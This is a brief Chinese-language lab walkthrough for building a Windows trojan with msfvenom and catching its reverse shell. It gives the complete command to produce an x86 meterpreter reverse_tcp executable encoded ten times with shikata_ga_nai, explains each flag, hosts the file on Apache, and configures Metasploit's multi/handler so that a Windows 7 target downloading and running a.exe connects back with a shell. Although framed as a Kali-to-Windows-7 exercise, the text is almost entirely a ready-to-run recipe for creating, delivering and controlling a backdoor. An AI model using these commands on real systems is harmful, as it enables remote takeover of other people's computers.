msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。
实验环境:kali和windows7
在kali终端中进行:
一: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/a.exe
-a : 指定系统架构
--platform : 指定平台
-p : 指定攻击载荷
lhost :监听地址
lport: 监听端口
-b: 去掉坏字符
-e: 指定编码器
-i: 指定编码次数
-f:指定输出文件格式
-o: 指定输出路径
二:进入监听模块
msfdb run进入msfvenom框架
use exploit/multi/handler 使用handler模块
show options 查看配置参数
设置payload:set payload windows/meterpreter/reverse_tcp
设置lhost:监听地址(必须和木马上的监听地址一致)set lhost ip
设置lport:监听端口 (必须和木马上的监听端口一致)set lport 4444
启动监听:run
启动apache2
三:在Windows7上进行下载a.exe并运行a.exe
目标主机成功上线成功获得shell